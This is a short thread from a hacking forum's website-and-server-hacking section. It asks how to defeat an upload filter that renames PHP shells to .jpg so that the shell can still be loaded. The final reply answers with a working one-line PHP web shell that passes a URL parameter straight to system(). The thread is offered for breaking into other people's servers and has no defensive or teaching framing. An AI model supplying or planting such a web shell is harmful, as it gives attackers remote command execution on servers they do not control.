![]() |
|
How to bypass file rename when loading php shell? - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking) +--- Thread: How to bypass file rename when loading php shell? (/Thread-How-to-bypass-file-rename-when-loading-php-shell) |
How to bypass file rename when loading php shell? - Frintezza - 02-01-2023 Hi guys, how to bypass file rename when loading php shell? for example, when I load a file shell.php it is renamed to shell.jpg RE: How to bypass file rename when loading php shell? - Marta_M - 02-03-2023 thank you very much, you helped me a lot!!! RE: How to bypass file rename when loading php shell? - DoXeD - 02-03-2023 (02-01-2023, 08:32 AM)Frintezza Wrote: Hi guys, how to bypass file rename when loading php shell? for example, when I load a file shell.php it is renamed to shell.jpg <?php echo "Shell";system($_GET['cmd']); ?> |